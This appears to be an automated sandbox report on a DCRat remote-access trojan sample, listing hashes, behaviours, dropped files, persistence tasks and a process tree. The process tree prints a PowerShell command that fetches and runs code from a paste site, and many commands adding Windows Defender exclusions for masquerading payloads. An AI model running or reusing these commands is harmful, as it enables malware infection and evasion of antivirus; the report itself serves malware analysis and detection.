dcrat | 688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028

Analysis

max time kernel
103s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-01-2025 02:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
Size

61KB
MD5

3437a2105a9740ad94b06f04378bb5b9
SHA1

80ca4ebff21e3a4962ccdec2853308ba544cdeb9
SHA256

688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028
SHA512

5d30cc5fe4b59a99f8c188c9d9efeb22d4813bd1fed44b4cb6f4bc1d045d51a31591c40f41324fc0afd65e1b4630aa304f5e8d90009ec6f1c690c75313a74076
SSDEEP

1536:lF6AD4dXD7tlo9OlvBu/b2QDAOzJri76tF:qZdnty9ODu/b2Vexi7a

Score

10^/10

dcrat execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 51 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1916	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4472	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2076	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4880	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2600	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3340	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5112	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2368	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	624	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1352	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2932	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	540	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1116	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4280	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4960	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3464	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4332	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2608	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3684	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3036	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1640	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1956	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	464	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4956	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2144	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3644	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2940	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1412	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1580	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1700	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1572	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2256	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3052	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1448	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5080	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1860	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1464	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2696	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1108	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1524	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4208	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	700	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4684	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4384	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4992	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3320	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1756	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5040	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2568	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3552	1644	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2416	1644	schtasks.exe	87

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/memory/3380-3-0x000000001B520000-0x000000001B620000-memory.dmp	dcrat

Blocklisted process makes network request 6 IoCs

flow	pid	Process
22	3772	powershell.exe
24	3772	powershell.exe
25	3772	powershell.exe
31	4676	powershell.exe
32	4676	powershell.exe
33	4676	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1104	powershell.exe
2000	powershell.exe
684	powershell.exe
2392	powershell.exe
3092	powershell.exe
3848	powershell.exe
3964	powershell.exe
3784	powershell.exe
2760	powershell.exe
5008	powershell.exe
5092	powershell.exe
3404	powershell.exe
5012	powershell.exe
4704	powershell.exe
4124	powershell.exe
4500	powershell.exe
2028	powershell.exe
740	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	explorer.exe

Executes dropped EXE 1 IoCs

pid	Process
5708	explorer.exe

Drops file in Program Files directory 16 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\22eafd247d37c3	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\wininit.exe	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Program Files (x86)\MSBuild\explorer.exe	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Program Files\Windows Sidebar\Shared Gadgets\dllhost.exe	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\sysmon.exe	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\9e8d7a4ca61bd9	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\TextInputHost.exe	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Program Files (x86)\MSBuild\7a0fd90576e088	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Program Files\Windows Sidebar\Shared Gadgets\5940a34987c991	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\csrss.exe	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\886983d96e3d3e	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\56085415360792	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\SppExtComObj.exe	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\e1ef82546f0b02	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\121e5b5079f7c0	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe

Drops file in Windows directory 13 IoCs

description	ioc	Process
File created	C:\Windows\fr-FR\7a0fd90576e088	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Windows\Prefetch\OfficeClickToRun.exe	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Windows\PolicyDefinitions\de-DE\RuntimeBroker.exe	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Windows\PolicyDefinitions\de-DE\9e8d7a4ca61bd9	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Windows\TAPI\29c1c3cc0f7685	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Windows\Provisioning\Packages\sppsvc.exe	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Windows\Provisioning\Packages\0a1fd5f707cd16	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Windows\fr-FR\explorer.exe	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Windows\Performance\WinSAT\DataStore\ee2ad38f3d4382	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Windows\Performance\WinSAT\DataStore\Registry.exe	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Windows\Prefetch\e6c9b481da804f	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File created	C:\Windows\TAPI\unsecapp.exe	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
File opened for modification	C:\Windows\fr-FR\explorer.exe	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 51 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3320	schtasks.exe
1640	schtasks.exe
4956	schtasks.exe
5080	schtasks.exe
1860	schtasks.exe
2696	schtasks.exe
2076	schtasks.exe
3340	schtasks.exe
2932	schtasks.exe
3464	schtasks.exe
1956	schtasks.exe
1448	schtasks.exe
1464	schtasks.exe
1108	schtasks.exe
2144	schtasks.exe
1412	schtasks.exe
4684	schtasks.exe
1916	schtasks.exe
2368	schtasks.exe
4332	schtasks.exe
2608	schtasks.exe
2940	schtasks.exe
700	schtasks.exe
1756	schtasks.exe
2568	schtasks.exe
2600	schtasks.exe
540	schtasks.exe
4280	schtasks.exe
464	schtasks.exe
3684	schtasks.exe
3036	schtasks.exe
1524	schtasks.exe
4992	schtasks.exe
4472	schtasks.exe
4880	schtasks.exe
1116	schtasks.exe
4960	schtasks.exe
5040	schtasks.exe
3552	schtasks.exe
1572	schtasks.exe
3052	schtasks.exe
4208	schtasks.exe
4384	schtasks.exe
5112	schtasks.exe
624	schtasks.exe
1580	schtasks.exe
1700	schtasks.exe
2416	schtasks.exe
1352	schtasks.exe
3644	schtasks.exe
2256	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
3772	powershell.exe
3772	powershell.exe
3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
3404	powershell.exe
3404	powershell.exe
740	powershell.exe
740	powershell.exe
684	powershell.exe
684	powershell.exe
5012	powershell.exe
5012	powershell.exe
4500	powershell.exe
4500	powershell.exe
3848	powershell.exe
3848	powershell.exe
2028	powershell.exe
2028	powershell.exe
4124	powershell.exe
4704	powershell.exe
4704	powershell.exe
4124	powershell.exe
3784	powershell.exe
3784	powershell.exe
1104	powershell.exe
1104	powershell.exe
5008	powershell.exe
5008	powershell.exe
2392	powershell.exe
2392	powershell.exe
5092	powershell.exe
5092	powershell.exe
2760	powershell.exe
2760	powershell.exe
3964	powershell.exe
3964	powershell.exe
2000	powershell.exe
2000	powershell.exe
3092	powershell.exe
3092	powershell.exe
4124	powershell.exe
2392	powershell.exe
684	powershell.exe
684	powershell.exe
2028	powershell.exe
4704	powershell.exe
5012	powershell.exe
5012	powershell.exe
740	powershell.exe
740	powershell.exe
4500	powershell.exe
4500	powershell.exe
3784	powershell.exe
3404	powershell.exe
3404	powershell.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
Token: SeDebugPrivilege	3772	powershell.exe
Token: SeDebugPrivilege	3404	powershell.exe
Token: SeDebugPrivilege	740	powershell.exe
Token: SeDebugPrivilege	684	powershell.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	5012	powershell.exe
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeDebugPrivilege	3848	powershell.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	4124	powershell.exe
Token: SeDebugPrivilege	4704	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	5708	explorer.exe
Token: SeDebugPrivilege	4676	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3380 wrote to memory of 3048	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	84
PID 3380 wrote to memory of 3048	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	84
PID 3048 wrote to memory of 3772	3048	cmd.exe	86
PID 3048 wrote to memory of 3772	3048	cmd.exe	86
PID 3380 wrote to memory of 3404	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	139
PID 3380 wrote to memory of 3404	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	139
PID 3380 wrote to memory of 2028	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	140
PID 3380 wrote to memory of 2028	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	140
PID 3380 wrote to memory of 4500	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	141
PID 3380 wrote to memory of 4500	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	141
PID 3380 wrote to memory of 4124	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	142
PID 3380 wrote to memory of 4124	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	142
PID 3380 wrote to memory of 684	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	143
PID 3380 wrote to memory of 684	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	143
PID 3380 wrote to memory of 2000	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	144
PID 3380 wrote to memory of 2000	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	144
PID 3380 wrote to memory of 5012	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	147
PID 3380 wrote to memory of 5012	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	147
PID 3380 wrote to memory of 5092	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	148
PID 3380 wrote to memory of 5092	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	148
PID 3380 wrote to memory of 5008	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	149
PID 3380 wrote to memory of 5008	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	149
PID 3380 wrote to memory of 2760	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	150
PID 3380 wrote to memory of 2760	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	150
PID 3380 wrote to memory of 4704	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	151
PID 3380 wrote to memory of 4704	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	151
PID 3380 wrote to memory of 3092	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	152
PID 3380 wrote to memory of 3092	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	152
PID 3380 wrote to memory of 1104	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	153
PID 3380 wrote to memory of 1104	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	153
PID 3380 wrote to memory of 3784	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	154
PID 3380 wrote to memory of 3784	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	154
PID 3380 wrote to memory of 2392	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	156
PID 3380 wrote to memory of 2392	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	156
PID 3380 wrote to memory of 3964	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	157
PID 3380 wrote to memory of 3964	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	157
PID 3380 wrote to memory of 3848	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	158
PID 3380 wrote to memory of 3848	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	158
PID 3380 wrote to memory of 740	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	159
PID 3380 wrote to memory of 740	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	159
PID 3380 wrote to memory of 2076	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	175
PID 3380 wrote to memory of 2076	3380	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe	175
PID 2076 wrote to memory of 5668	2076	cmd.exe	177
PID 2076 wrote to memory of 5668	2076	cmd.exe	177
PID 3772 wrote to memory of 5184	3772	powershell.exe	178
PID 3772 wrote to memory of 5184	3772	powershell.exe	178
PID 5184 wrote to memory of 5372	5184	cmd.exe	180
PID 5184 wrote to memory of 5372	5184	cmd.exe	180
PID 5184 wrote to memory of 5528	5184	cmd.exe	181
PID 5184 wrote to memory of 5528	5184	cmd.exe	181
PID 5184 wrote to memory of 5540	5184	cmd.exe	182
PID 5184 wrote to memory of 5540	5184	cmd.exe	182
PID 2076 wrote to memory of 5708	2076	cmd.exe	186
PID 2076 wrote to memory of 5708	2076	cmd.exe	186
PID 5708 wrote to memory of 5272	5708	explorer.exe	188
PID 5708 wrote to memory of 5272	5708	explorer.exe	188
PID 5272 wrote to memory of 4676	5272	cmd.exe	190
PID 5272 wrote to memory of 4676	5272	cmd.exe	190
PID 4676 wrote to memory of 5676	4676	powershell.exe	193
PID 4676 wrote to memory of 5676	4676	powershell.exe	193
PID 5676 wrote to memory of 644	5676	cmd.exe	195
PID 5676 wrote to memory of 644	5676	cmd.exe	195
PID 5676 wrote to memory of 5908	5676	cmd.exe	196
PID 5676 wrote to memory of 5908	5676	cmd.exe	196

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe
"C:\Users\Admin\AppData\Local\Temp\688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3380
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3772
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\runtime.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5184
    - - C:\Windows\system32\findstr.exe
        
        findstr /i "echo" "C:\Users\Admin\AppData\Roaming\runtime.bat"
        5⤵
        
        PID:5372
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo \\DADDYSERVER "
        5⤵
        
        PID:5528
    - - C:\Windows\system32\findstr.exe
        
        findstr /i "DADDYSERVER"
        5⤵
        
        PID:5540
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\fr-FR\explorer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Prefetch\OfficeClickToRun.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4500
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PolicyDefinitions\de-DE\RuntimeBroker.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4124
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dllhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\TextInputHost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\TextInputHost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\wininit.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\MSBuild\explorer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\SppExtComObj.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2760
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Shared Gadgets\dllhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
